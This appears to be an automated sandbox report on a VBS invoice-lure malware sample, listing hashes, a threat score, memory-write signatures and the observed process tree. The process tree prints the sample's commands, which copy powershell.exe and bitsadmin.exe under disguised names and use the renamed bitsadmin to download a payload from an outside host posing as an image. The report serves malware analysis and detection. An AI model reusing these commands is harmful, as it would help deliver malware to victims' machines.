Analysis
- max time kernel: 65s
- max time network: 68s
- platform: windows10_x64
- resource: win10v200430
- submitted: 13-07-2020 07:40
Static task
- static1

Behavioral task
- behavioral1
  - Sample: Fatt_cliente_07008120482.vbs
  - Resource: win7
  - 0 signatures
  - 0 seconds

Behavioral task
- behavioral2
  - Sample: Fatt_cliente_07008120482.vbs
  - Resource: win10v200430
  - 0 signatures
  - 0 seconds
General
- Target: Fatt_cliente_07008120482.vbs
- Size: 4KB
- MD5: 740e42ba34a3eb4f22a7f2ce3a738a5c
- SHA1: ad8a96ca8d57f0d18ff06366d507d547deb051b0
- SHA256: 1b30d432a173c580e9c49c492974bb046d9702bb53a80eccd5c4137ecf9ef839
- SHA512: f15559533b8dadf6571e141347db4c90c4679fd57346760a4912d94d6dcc33b4049bc93565ae9acb75324b039c065f78a294dfff9594a73a6d7fcdbfee3bba54
Score
8/10
Malware Config
Signatures
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes: WScript.exe

  | description | pid | process | target process |
  | --- | --- | --- | --- |
  | PID 2916 wrote to memory of 416 | 2916 | WScript.exe | cmd.exe |
  | PID 2916 wrote to memory of 416 | 2916 | WScript.exe | cmd.exe |
  | PID 2916 wrote to memory of 808 | 2916 | WScript.exe | cmd.exe |
  | PID 2916 wrote to memory of 808 | 2916 | WScript.exe | cmd.exe |
  | PID 2916 wrote to memory of 812 | 2916 | WScript.exe | wubvVZY.exe |
  | PID 2916 wrote to memory of 812 | 2916 | WScript.exe | wubvVZY.exe |
  | PID 2916 wrote to memory of 812 | 2916 | WScript.exe | wubvVZY.exe |

- Executes dropped EXE (1 IoCs)
  Processes: wubvVZY.exe

  | pid | process |
  | --- | --- |
  | 812 | wubvVZY.exe |
Processes
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fatt_cliente_07008120482.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\zwubvVZY.exe
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\wubvVZY.exe
  - C:\Users\Admin\AppData\Roaming\wubvVZY.exe
    "C:\Users\Admin\AppData\Roaming\wubvVZY.exe" /transfer VWCWnV /download https://sheyenneweber.com/webol/07008120482/logo.jpg C:\Users\Admin\AppData\Roaming\logo.jpg
    - Executes dropped EXE
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Admin\AppData\Roaming\wubvVZY.exe
- memory/416-1-0x0000000000000000-mapping.dmp
- memory/808-2-0x0000000000000000-mapping.dmp
- memory/812-4-0x0000000000000000-mapping.dmp
- memory/2916-0-0x0000027CB4C00000-0x0000027CB4C04000-memory.dmp (Filesize: 16KB)